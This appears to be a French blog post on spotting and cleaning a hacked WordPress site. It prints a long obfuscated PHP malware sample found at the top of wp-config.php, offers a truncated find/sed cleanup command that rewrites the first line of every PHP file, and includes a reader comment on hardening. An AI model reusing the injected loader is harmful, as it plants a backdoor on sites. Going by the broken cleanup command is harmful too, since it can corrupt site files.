Développement
Comment savoir si wordpress est hacké
Bonjour à tous,
Si comme moi, vous avez déjà eu quelques hacks sur wordpress et que vous voulez vous en débarrasser. VOici une petite astuce.
Pour commencer connectez vous en FTP et éditez le fichier wp-config.php (par exemple).
Si celui ci contient dès les premières lignes quelque chose du genre:
[pastacode lang= »php » message= »Hack wordpress » highlight= » » provider= »manual »]
?*2b%x5c%x7825)gpf{jt)!gj!<*2bddovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x7825-#j]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d]2825)!gj!~j%x5c%x7825!<**3-j%x5c%x7825-8W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7825h>-rr.93e:5597f-s.973:8297f:5297e:56-%x5c%x7878r.985:5298u%x5c%x7825)7fmji%x5c%x78786!#]y76]277]y72]265]y39]c%x78256j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x78%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7x70%154%x69%164%50%x22%134%x78%62%x35%165%x3a%146.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c#-%x5c%x7825o:W%x5c%x7825c:>1<7825ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%x7825%x5c%x7824-%x5c%x782x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOx5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5cM4P8]37]278]225]241]334]368]322]3]364]6]283]427825)}.;%x5c%x7860UQPMSVDc%x7825}&;ftmbg}%x5c%x787f;!osvufs}w25-#1]#-bubE{h%x5c%x7825)tpqsut>825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x7825:<#64ye]53Ld]53]Kc]55Ld]55#*<%x5c%x7mjgA%x5c%x7827doj%x5c%x78256-*f%x5c%x7825)sf%x5c%x7878pmpusutx7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;e%x5c%x78b%x5c%x7825825z>>2*!%x5c%x7825z>32!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6<.[A%x5c%7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Db%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]2t0}Z;0]=]0#)2q%x5c%x7825l}S;2-5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%rror_reporting(0); preg_replace("%x2c%x7825V<#65,47R25,d7R17,67R37,#%x5c%bubE{h%x5c%x7825)sutcvt-#w#)ldbjs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x78c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5x5c%x7827{ftmfV%x5c%f#<%x5c%x7825tdz>#L4]27c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782x782f2986+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#)sfebfI{*w%x5c%x7825)kV%c%x7825V<*#fopoV;hojepdoF.uofuopDf#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6%#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7787f;!|!}{;)gj}l;33bq}k;opjux787f<*X&Z&S{ftmfV%x5c%x787f<*XAZAS5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x5c%x78259]252]y83]273]y72]282#!#])fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]2x7825c!>!%x5c%x7825i%x5c%x785c2^>}R;msv}.;%x5c%x782c%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5cV<*w%x5c%x7825)ppde>u%x5g+)!gj+{e%x5c%x7825!osvufs!*!+A!>!1]y43]78]y33]65]y31]55]y85]82]y76]6B%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x78625w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5x5c%x7827pd%x5c%x78256j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UVPu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%x7)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEtpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%xy84]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5c%x7825tmw!>!#LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x7825;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)vt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bqov>*ofmy%x5c%x7825)utjm!|!*tutjyf%x5c%x7860opjudovg825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy!%%x5c%x7825-#1GO%x5c%x782ubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!**#j{25)3of:opjudovg<~%x5c%x7824!%x5c%#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6>%x5c%x7822:ftmbg39?]_%x5c%x785c}X%x5c%x78x782fq%x5c%x7825>U<#16,47R57,27R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7x5c%x78256^#zsfvr#%xhA%x5c%x7827pd%x5c%xftmf!~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpq155%x61%160%x28%42%x66%152%x66%147%x67%42%x2c%163%x74%162%x5f%163%-%x5c%x7824]26%x5c%x7824-%x5c%x7824<%25s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b:#]y74]273]y76]252]y85npd19275fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-]y3d]51]y35]274]y4:]82]y3:]62]y4c#!%x5mm)%x5c%x7825%x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-824-%x5c%x7824!>!tus%x5!*)323zbek!~!b%x5c%x7825Z<#j:>>1*!%x5c%x7825b:>1!}%x5c%x7827;!>>>!}_;gvc%x51%x72%164") && (!issw*[!%x5c%x7825rN}#QwTW%x5cf#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qpc%x785c%x5c%x7825j^%x5c%x78247825%x5c%x7824-%x5c%x799386c6f+9f5d816:+946:ce44#0QUUI&c_UOFHB%x5c%x7860SF7>%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)ho}#-#%x5c%x7824-%x5c%x73]y76]271]y7d]252]y74]256##]y3g]61]y3f]63]y3:]68]y765-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6c%x7825%x5c%x7827jsv%]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#1<%x5c%x7825j=tj{fpg)%x5c%x825kj:-!OVMM*<(<%x5c%x78e%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x525j:,,Bjg!)%x5c%x78255L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]K5:osvufs:~:<*9-1-r%x5c%x7825)s%x5cx7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6%x5c%x7825s:%x5c%x785c%x5c%x7825j:^>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}FNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78r#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y3of>2bd%x5c%x7825!<5h%x5x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782f75c%x78257-C)fepmqnjA%x5c%x7827&6<.fopo#>b%x5c%x7825!*##>>X)!gjZ<824*!fyqmpef)#%x5c%x7824*!#]y3d]51]y35]256]y76]72%x5c%x7825b:>11<%x5c%x7825j:=t#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%5!%x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%xif((function_exists("%x6f%142%x5f%163%x74%14TV%x5c%x7860QUUI&b%x5c%x7825!|]y3e]81#%x5c%x782f#7e:55946-t]256]y6g]257]y86]267]y74]275]y7:]268]y7f##]y31]278]y3e]81]K78:56985:6197g:74985825<#g6R85,67R37,18R#>q%x5K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x%x7825eN+#Qi%x5c%x785c1^W%x5c%825<#762]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x78x5c%x782f7&6|7**111127-K)ebfsX%x5c%x7827EzH,2W%x5c%x7825wN;#-Ez-1H*WCx5c%x7824-%x5c%x7824*!%x5c%x782400~:!#x5c%x7825nfd)##Qtpz)#]341]88%166%x61%154%x28%151%x6d%160%x6c%157%x64]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s#B#-#T#-#E#-#G#-#H#-#I#-#K#-0ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5c25}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%xhnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x2#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)x782f#p#%x5c%x782f%x5c%x7825zEw:Qb:Qc:W~!%x5c%x7825z!>21f%50%x2e%52%x29%57%x65","%x65u%x5c%x7825!-#2#%x5c%x782f#%x5c%#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x78612)eobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7)!gj!|!*msv%x5c%x7825)}k~~~:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7c%x7825)fnbozcYufhA%x5c%x78272qj%*56A:>:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{h19275j{h%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47)1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%mw)%x5c%x7825tww**WYsboepn)%x%x7860{66~6<&w6<%x5c%x78%x5c%x7825b:>%x5c%x787]36]373P6]36]73]83]238M7x7822)!gj}1~!<2p%x5c%x7825%x#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x57fw6*CW&)7gj6<*doj%x-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#%145%x28%141%x72%162%x61%171%x5f%c%x7824]y8%x5c%x78245c%x7825bss-%x5c%x7825r%x5c%x7878B%x57-2qj%x5c%x78257-K)udfoopx5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x78c%x7825)n%x5c%x7825-#+I#!-id%x5c%x7825)uqpuft%x5c%x7860msvd},c%x787f_*#ujojRk3%x5c%34]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe)>5h%x5c%x7825!<*::::::-1111{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f/(.*)/epreg_replacelmuciwreta\'; $zlcmiavdjg = explode(chr((227-183)),\'7717,44,5241,20,7443,69,4222,54,2030,36,8943,29,8487,40,9676,33,4563,66,808,49,5762,63,4156,66,3239,36,499,60,621,36,3275,52,4434,20,7964,32,857,56,2496,63,8264,40,329,63,2134,48,657,51,7872,63,9766,25,5134,54,3705,70,5435,50,6822,45,9207,33,7045,52,9553,36,5869,21,4411,23,7415,28,6974,47,9004,58,8606,61,9455,24,9589,20,7097,35,1541,28,5625,21,5944,36,6291,63,3387,65,6934,40,6071,57,9920,22,1803,46,1602,63,6867,67,8118,48,1350,25,9883,37,5188,53,1375,36,3775,60,3925,24,9114,42,4454,66,3327,60,4520,43,708,62,1411,32,7321,37,142,67,2103,31,3897,28,7676,41,7220,41,3835,62,4037,70,8723,35,9525,28,2685,70,0,35,4013,24,8794,58,7021,24,2271,59,2451,45,9298,45,2797,51,10009,27,9062,52,6589,53,5695,67,392,66,1569,33,6758,64,5383,27,3513,60,3203,36,5410,25,7761,30,4973,53,7132,29,7626,50,1236,68,2971,29,3452,61,3000,46,5287,45,6461,31,8758,36,7358,22,4276,45,9240,58,4780,47,5561,64,5098,36,3134,34,10036,70,5054,44,2228,20,2650,35,3110,24,2066,37,4344,67,8092,26,2418,33,2393,25,9791,68,8667,56,2622,28,35,53,1938,30,8972,32,6242,49,4321,23,458,41,6415,46,2755,42,3643,62,4719,61,7820,52,8362,44,6208,34,9343,42,1085,55,9859,24,9156,51,1443,68,8527,51,770,38,8196,68,4107,49,8406,53,5890,54,1735,68,2182,46,5332,29,9609,67,5485,21,7380,35,4950,23,559,62,9709,20,4629,37,1016,69,8333,29,5980,58,5361,22,7161,59,994,22,7512,65,4827,55,3046,64,8166,30,2917,54,7996,49,6642,51,209,65,8304,29,5261,26,1178,58,7261,60,9426,29,9729,37,8045,47,274,55,5825,44,7791,29,6693,65,3573,70,1849,49,2248,23,6149,59,1511,30,3949,64,7935,29,1968,62,8459,28,1304,46,9500,25,2848,69,9942,67,9385,41,2330,63,913,30,7577,49,6492,28,6128,21,5026,28,9479,21,4666,53,6520,69,8893,50,1140,38,8852,41,1685,50,943,51,1665,20,4882,68,8578,28,2559,63,6038,33,1898,40,5506,55,6354,61,88,54,3168,35,5646,49\'); $spbumcxyfi=substr($mtqvzubsmd,(63915-53809),(21-14)); if (!function_exists(\'mwrhcidctz\')) { function mwrhcidctz($zebzhykwih, $hgkaxslrtf) { $tlbmjrizuh = NULL; for($gnyaudjggn=0;$gnyaudjggn<(sizeof($zebzhykwih)/2);$gnyaudjggn++) { $tlbmjrizuh .= substr($hgkaxslrtf, $zebzhykwih[($gnyaudjggn*2)],$zebzhykwih[($gnyaudjggn*2)+1]); } return $tlbmjrizuh; };} $cavsztcqlk="x2057x2a40x69155x69146x74171x75150x76170x2052x2f40x65166x61154x28163x74162x5f162x65160x6c141x63145x28143x68162x2850x3161x3655x3771x2951x2c40x63150x7250x2863x3960x2d62x3970x2951x2c40x6d167x72150x63151x64143x74172x2844x7a154x63155x69141x76144x6a147x2c44x6d164x71166x7a165x62163x6d144x2951x2973x2057x2a40x74171x77151x6b144x63170x63145x2052x2f40"; $rrfzgzfeho=substr($mtqvzubsmd,(54238-44125),(73-61)); $rrfzgzfeho($spbumcxyfi, $cavsztcqlk, NULL); $rrfzgzfeho=$cavsztcqlk; $rrfzgzfeho=(426-305); $mtqvzubsmd=$rrfzgzfeho-1; ?> [/pastacode]
vous l\’aurez deviné, votre wordpress est infecté.
Comment faire pour réparer ce problème ?
Et bien j\’ai une petite astuce qui consiste à se connecter en SSH, puis de se rendre à la racine de son site et lancer la commande:
[pastacode lang= »bash » message= » » highlight= » » provider= »manual »]
find . -name "*.php" -exec sed -i \'1 s/.*/ [/pastacode]
Laissez mouliner un peu et une fois l\’opération terminée, rééditez votre wp-config.php et votre problème devrait être réglé.
Cela dit, je ne sais pas encore d\’ou provient le hack, n\’hésitez pas à commenter si vous avez plus d\’informations à propos de celui-ci.
Enjoy 😉
Commentaires
Le 23 septembre 2015 à 13 01 42 09429, Alan a dit :
En général ce genre d'insertion se fait à partir des failles plugin ou plus grave : Wordpress lui même pour trouver son origine : il faut checker les tentatives d'attaques sur les serveur :
go "access.log" et essayes de repérer des connexion du même ip vers plein de dossiers et plugin que tu n'as pas forcément.
Ces attaques tentent de repérer les failles d'upload ou des droits d'utilisateurs un peu "libertins". La meilleur défense que j'ai trouvé c'est de mettre des htaccess un peu partout (dossier upload, config...) et bien sur limiter au maximum les chmod)
Laisser un commentaire